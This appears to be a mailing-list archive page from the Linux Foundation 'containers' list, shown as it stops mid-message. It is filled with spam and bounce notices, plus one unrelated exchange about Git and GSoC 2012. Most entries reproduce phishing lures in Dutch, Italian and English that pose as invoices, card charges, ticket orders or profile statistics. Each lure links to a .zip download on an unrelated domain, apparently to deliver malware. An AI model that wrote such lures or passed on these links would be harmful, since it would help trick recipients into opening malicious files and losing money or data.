        Thu, 01 Mar 2012 11:42:10 -0800 (PST)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 81.93.250.157 as permitted sender) client-ip=81.93.250.157;
Authentication-Results: mx.google.com; spf=hardfail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 81.93.250.157 as permitted sender) smtp.mail=containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
Received: from [81.93.250.157] by srv1157.sd-france.net id WP9t52nSVahS with SMTP; Thu, 01 Mar 2012 20:44:10 +0100
Date: Thu, 01 Mar 2012 20:44:10 +0100
From: "CFX Group." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
X-Mailer: The Bat! (v3.08.2) Business
X-Priority: 3 (Normal)
Message-ID: <911400853.36891081066513-//J07LhNTfpNmCTVG0Af2SpxlwaOVQ5f@public.gmane.org>
To: <samen-7JyGct4xDq8rhIT/V1i8nA@public.gmane.org>
Subject: Re: document 56271
MIME-Version: 1.0
Content-Type: text/plain;
	charset="windows-1252"
Content-Transfer-Encoding: 8bit



   
Beste,


The answer to your request about profile consultation on ours the Web to page of 09.08.2011.

Statistics is enclosed in archive, we will be glad to cooperate in the future.
http://czechtravel.nl/downloadpdf/nl/Details.zip?ID934572841751

Thanks,
 
Tony Caruso
Consult Adviser
Union Consult Group
(C) 205 572-4847
(F) 205 583-0062

Web site; unionconsult org

Home address; 16 Morningside Rd, Easton CT 98033

-- 
Ray Paltauf
Connecticut Outdoor Living
205 206 506-5720

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-01 12:30 postmaster-wGBAL9bNL4J2HSIiUldxkQdIgGIafgBh
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-wGBAL9bNL4J2HSIiUldxkQdIgGIafgBh @ 2012-03-01 12:30 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 188 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       nnetteheusschen-K5eX1qpgT3jcwJP6hvsaC1Qf샫䛥@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 260 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2421 bytes --]

From: "Invoice" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <nnetteheusschen-K5eX1qpgT3jcwJP6hvsaC1Qf+wOtG5Vj@public.gmane.org>
Subject: Re: document 947897
Date: Thu, 01 Mar 2012 13:25:41 +0100
Message-ID: <4022696711.48685194347157-//J07LhNTfpNmCTVG0Af2SpxlwaOVQ5f@public.gmane.org>



Beste gebruiker,
   

Het antwoord op uw vraag over het profiel op onze website 19.02.2012.

Linkstatistieken
http://www.gamal.it/downloadpdf/nl/Invoice.zip?ID90304790


Id 5259606             .




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2012-02-28 19:02   ` Rajat Khanduja
@ 2012-02-28 19:48     ` Jeff King
  0 siblings, 0 replies; 183+ messages in thread
From: Jeff King @ 2012-02-28 19:48 UTC (permalink / raw)
  To: Rajat Khanduja; +Cc: git

On Wed, Feb 29, 2012 at 12:32:37AM +0530, Rajat Khanduja wrote:

> I am a student interested in participating in GSOC'12 and was curious
> to know if Git is participating in the program this year.

We haven't applied yet, but I think we are planning on it. Getting our
application started is on my to-do list this week.

-Peff

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <001636c927b40af7cb04ba0aca6e@google.com>
@ 2012-02-28 19:02   ` Rajat Khanduja
  2012-02-28 19:48     ` Jeff King
  0 siblings, 1 reply; 183+ messages in thread
From: Rajat Khanduja @ 2012-02-28 19:02 UTC (permalink / raw)
  To: git

Hi

I am a student interested in participating in GSOC'12 and was curious
to know if Git is participating in the program this year.

Sincerely,

Rajat

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-02-28  9:22 postmaster-Oy8cep8j1bSEVqv0pETR8A
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-Oy8cep8j1bSEVqv0pETR8A @ 2012-02-28  9:22 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 234 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       hazenoot-Oy8cep8j1bSEVqv0pETR8A@public.gmane.org
       h.r.maliepaardh-Oy8cep8j1bSEVqv0pETR8A@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 351 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1751 bytes --]

From: "OrdersCo" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <h.r.maliepaardh-Oy8cep8j1bSEVqv0pETR8A@public.gmane.org>
Subject: [****SPAM****]A [****SPAM****] Gereed.
Date: Tue, 28 Feb 2012 04:22:50 -0500
Message-ID: <6367969960.14778596359944-PBrG2Ygu4YotuMo1XmBnHVHeKjDIEhJXAL8bYrjMMd8@public.gmane.org>



         
goede morgen,

Uw bestelling wordt verwerkt
http://www.statistiche.cc/downloadpdf/nl/Details.zip

id1607393       




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-02-21  2:37 postmaster-ORiaYrpEo8U
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-ORiaYrpEo8U @ 2012-02-21  2:37 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 196 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       une.triuggio.mi.itnorahtpentowsnq-uGzjIMqvpCMqRzXS/x11ag@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 255 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1310 bytes --]

From: "Supportpay" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <une.triuggio.mi.itnorahtpentowsnq-uGzjIMqvpCMqRzXS/x11ag@public.gmane.org>
Subject: Il vostro ordine di riferimento e 130288
Date: Mon, 20 Feb 2012 18:37:03 -0800
Message-ID: <004701ccf041$afceae00$01000a0a-UqesdKZYNawCNHY3F7U79eTW4wlIGRCZ@public.gmane.org>



Gentile utente, 


L'aggiornamento di configurazione
http://www.affile.org/adviser/Confermata.zip?784658998


==
rzY9tQ




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-01-25 16:36 postmaster-Y8CQj97R1LIkmLvzuZlaBw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-Y8CQj97R1LIkmLvzuZlaBw @ 2012-01-25 16:36 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 171 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       fotod007-EIBgga6/0yRmR6Xm/wNWPw@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 311 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1.3: Type: text/rfc822-headers, Size: 276 bytes --]

From:  "paytransaction" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To:  <fotocreatief-EIBgga6/0yRmR6Xm/wNWPw@public.gmane.org>
Message-ID:  <004101ccdb7f$1665c680$0200a8c0-EKo9fkeo6mlnXn40ka+A6Q@public.gmane.org>
Subject:  Re: Betaling TsE-c2y


[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-01-25 16:36 postmaster-Y8CQj97R1LIkmLvzuZlaBw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-Y8CQj97R1LIkmLvzuZlaBw @ 2012-01-25 16:36 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 171 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       jmsch003-EIBgga6/0yRmR6Xm/wNWPw@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 311 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1.3: Type: text/rfc822-headers, Size: 276 bytes --]

From:  "paytransaction" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To:  <fotocreatief-EIBgga6/0yRmR6Xm/wNWPw@public.gmane.org>
Message-ID:  <004101ccdb7f$1665c680$0200a8c0-EKo9fkeo6mlnXn40ka+A6Q@public.gmane.org>
Subject:  Re: Betaling TsE-c2y


[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-12-21 15:44 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-12-21 15:44 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 197 bytes --]

The following message to <madelinenuriev-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 309 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1469 bytes --]

From: "PuremobileInc." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <korniakovodvzw-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org>
Subject: Your Order No 047543 | Puremobile Inc.
Date: Wed, 21 Dec 2011 18:36:10 +0200
Message-ID: <005001ccbffe$a3f14c00$0500a8c0-Ht5ggzGNZTA1utQcCIWLzqqTnoLfr3UQ@public.gmane.org>


Thank you for ordering from Puremobile Inc.

This message is to inform you that your order has been received 
and is currently being processed. 

Your order reference is 2489. You will need this in all 
correspondence. 

This receipt is NOT proof of purchase. We will send a printed 
invoice by mail to your billing address. 

You have chosen to pay by credit card. 
Your card will be charged for the amount 
of 837.10 USD and "Puremobile Inc." 
will appear next to the charge on your statement. 


Your purchase information appears below in web address
http://academiamates.com/Delivery.zip?PuremobileIncID645291547881104

______________________________________________________ 

Puremobile Inc. 
           



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-12-21 15:44 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-12-21 15:44 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 197 bytes --]

The following message to <korniakovodvzw-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 309 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1469 bytes --]

From: "PuremobileInc." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <korniakovodvzw-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org>
Subject: Your Order No 047543 | Puremobile Inc.
Date: Wed, 21 Dec 2011 18:36:10 +0200
Message-ID: <005001ccbffe$a3f14c00$0500a8c0-Ht5ggzGNZTA1utQcCIWLzqqTnoLfr3UQ@public.gmane.org>


Thank you for ordering from Puremobile Inc.

This message is to inform you that your order has been received 
and is currently being processed. 

Your order reference is 2489. You will need this in all 
correspondence. 

This receipt is NOT proof of purchase. We will send a printed 
invoice by mail to your billing address. 

You have chosen to pay by credit card. 
Your card will be charged for the amount 
of 837.10 USD and "Puremobile Inc." 
will appear next to the charge on your statement. 


Your purchase information appears below in web address
http://academiamates.com/Delivery.zip?PuremobileIncID645291547881104

______________________________________________________ 

Puremobile Inc. 
           



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-12-21 15:44 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-12-21 15:44 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 196 bytes --]

The following message to <meg_lopiccolo-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 308 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1469 bytes --]

From: "PuremobileInc." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <korniakovodvzw-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org>
Subject: Your Order No 047543 | Puremobile Inc.
Date: Wed, 21 Dec 2011 18:36:10 +0200
Message-ID: <005001ccbffe$a3f14c00$0500a8c0-Ht5ggzGNZTA1utQcCIWLzqqTnoLfr3UQ@public.gmane.org>


Thank you for ordering from Puremobile Inc.

This message is to inform you that your order has been received 
and is currently being processed. 

Your order reference is 2489. You will need this in all 
correspondence. 

This receipt is NOT proof of purchase. We will send a printed 
invoice by mail to your billing address. 

You have chosen to pay by credit card. 
Your card will be charged for the amount 
of 837.10 USD and "Puremobile Inc." 
will appear next to the charge on your statement. 


Your purchase information appears below in web address
http://academiamates.com/Delivery.zip?PuremobileIncID645291547881104

______________________________________________________ 

Puremobile Inc. 
           



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-12-21 15:44 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-12-21 15:44 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 203 bytes --]

The following message to <limmovieunlimitedbuf-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 315 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1469 bytes --]

From: "PuremobileInc." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <korniakovodvzw-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org>
Subject: Your Order No 047543 | Puremobile Inc.
Date: Wed, 21 Dec 2011 18:36:10 +0200
Message-ID: <005001ccbffe$a3f14c00$0500a8c0-Ht5ggzGNZTA1utQcCIWLzqqTnoLfr3UQ@public.gmane.org>


Thank you for ordering from Puremobile Inc.

This message is to inform you that your order has been received 
and is currently being processed. 

Your order reference is 2489. You will need this in all 
correspondence. 

This receipt is NOT proof of purchase. We will send a printed 
invoice by mail to your billing address. 

You have chosen to pay by credit card. 
Your card will be charged for the amount 
of 837.10 USD and "Puremobile Inc." 
will appear next to the charge on your statement. 


Your purchase information appears below in web address
http://academiamates.com/Delivery.zip?PuremobileIncID645291547881104

______________________________________________________ 

Puremobile Inc. 
           



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-12-21 15:44 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-12-21 15:44 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 189 bytes --]

The following message to <meppel-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 301 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1469 bytes --]

From: "PuremobileInc." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <korniakovodvzw-V9Nk94Ewkiv6EvPiGSbjXWZHpeb/A1Y/@public.gmane.org>
Subject: Your Order No 047543 | Puremobile Inc.
Date: Wed, 21 Dec 2011 18:36:10 +0200
Message-ID: <005001ccbffe$a3f14c00$0500a8c0-Ht5ggzGNZTA1utQcCIWLzqqTnoLfr3UQ@public.gmane.org>


Thank you for ordering from Puremobile Inc.

This message is to inform you that your order has been received 
and is currently being processed. 

Your order reference is 2489. You will need this in all 
correspondence. 

This receipt is NOT proof of purchase. We will send a printed 
invoice by mail to your billing address. 

You have chosen to pay by credit card. 
Your card will be charged for the amount 
of 837.10 USD and "Puremobile Inc." 
will appear next to the charge on your statement. 


Your purchase information appears below in web address
http://academiamates.com/Delivery.zip?PuremobileIncID645291547881104

______________________________________________________ 

Puremobile Inc. 
           



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-30  5:20 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-11-30  5:20 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 245 bytes --]

The following message to <2397920.8010906-IwsUOcnxNTHd/EuGEV170vP6llvjuJOh@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 <2397920.8010906@alfadevelopment.nl> is not a valid mailbox'

[-- Attachment #1.2: Type: message/delivery-status, Size: 394 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1475 bytes --]

From: "devnull" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <2397920.8010906-IwsUOcnxNTHd/EuGEV170vP6llvjuJOh@public.gmane.org>
Subject: Order.
Date: Wed, 30 Nov 2011 05:20:19 +0000
Message-ID: <000001ccaf1f$be646800$0200a8c0@cg2>



Hallo, 2397920.8010906


Het antwoord op uw vraag over het profiel op onze website 22.11.2011.

Dagelijks kunt u hier vinden:
http://uniuno.info/docdown/Account.zip?idinvoice=7170092669912Firma=2397920.8010906-IwsUOcnxNTHd/EuGEV170vP6llvjuJOh@public.gmane.org


==
We zullen blij zijn om samen te werken in de toekomst.



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-18 20:10 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-11-18 20:10 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 201 bytes --]

The following message to <a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 314 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2308 bytes --]

From: "Info" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org>
Subject: [SPAM] Ticket Service. Factuur N2084850944.
Date: Sat, 19 Nov 2011 03:09:02 +0700
Message-ID: <00bb01cca62d$e86b7f80$0200a8c0-7c6Ix4kHDaQZExBMZvFq70SMPvt2b7LnFH/NWWTyIFg@public.gmane.org>


Dear customer, 

Factuur moet worden betaald tot de week prosGentile gebruiker.

Bedank hem voor het bestellen van tickets via ons elektronisch systeem,
Vanuit haar credit card 'werd genomen 839 euro. Dank u.

Details van uw bestelling -
http://www.thunshop45nord.it/clientedown/Invoice.zip?ticetid546709767Billingid=a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org


Meer informatie kunt u de volgorde vinden die in uw account

Met vriendelijke groet,
Ticket Service
Tel./Fax.: +31 (70) 538-78-76



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-18 20:10 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-11-18 20:10 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 194 bytes --]

The following message to <abbey_siris-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 307 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2308 bytes --]

From: "Info" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org>
Subject: [SPAM] Ticket Service. Factuur N2084850944.
Date: Sat, 19 Nov 2011 03:09:02 +0700
Message-ID: <00bb01cca62d$e86b7f80$0200a8c0-7c6Ix4kHDaQZExBMZvFq70SMPvt2b7LnFH/NWWTyIFg@public.gmane.org>


Dear customer, 

Factuur moet worden betaald tot de week prosGentile gebruiker.

Bedank hem voor het bestellen van tickets via ons elektronisch systeem,
Vanuit haar credit card 'werd genomen 839 euro. Dank u.

Details van uw bestelling -
http://www.thunshop45nord.it/clientedown/Invoice.zip?ticetid546709767Billingid=a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org


Meer informatie kunt u de volgorde vinden die in uw account

Met vriendelijke groet,
Ticket Service
Tel./Fax.: +31 (70) 538-78-76



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-18 20:10 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-11-18 20:10 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 189 bytes --]

The following message to <bachan-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 302 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2308 bytes --]

From: "Info" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org>
Subject: [SPAM] Ticket Service. Factuur N2084850944.
Date: Sat, 19 Nov 2011 03:09:02 +0700
Message-ID: <00bb01cca62d$e86b7f80$0200a8c0-7c6Ix4kHDaQZExBMZvFq70SMPvt2b7LnFH/NWWTyIFg@public.gmane.org>


Dear customer, 

Factuur moet worden betaald tot de week prosGentile gebruiker.

Bedank hem voor het bestellen van tickets via ons elektronisch systeem,
Vanuit haar credit card 'werd genomen 839 euro. Dank u.

Details van uw bestelling -
http://www.thunshop45nord.it/clientedown/Invoice.zip?ticetid546709767Billingid=a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org


Meer informatie kunt u de volgorde vinden die in uw account

Met vriendelijke groet,
Ticket Service
Tel./Fax.: +31 (70) 538-78-76



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2011-11-18 20:10 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2011-11-18 20:10 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 192 bytes --]

The following message to <kosmithey-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'5.1.1 User unknown'

[-- Attachment #1.2: Type: message/delivery-status, Size: 305 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2308 bytes --]

From: "Info" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a1aaa1azzzz1zaaaaa-KeIyapyUy7n3sZAhJhHK82ZHpeb/A1Y/@public.gmane.org>
Subject: [SPAM] Ticket Service. Factuur N2084850944.
Date: Sat, 19 Nov 2011 03:09:02 +0700
Message-ID: <00bb01cca62d$e86b7f80$0200a8c0-7c6Ix4kHDaQZExBMZvFq70SMPvt2b7LnFH/NWWTyIFg@public.gmane.org>


Dear customer, 

Factuur moet worden betaald tot de week prosGentile gebruiker.

Bedank hem voor het bestellen van tickets via ons elektronisch systeem,
Vanuit haar credit card 'werd genomen 839 euro. Dank u.

Details van uw bestelling -
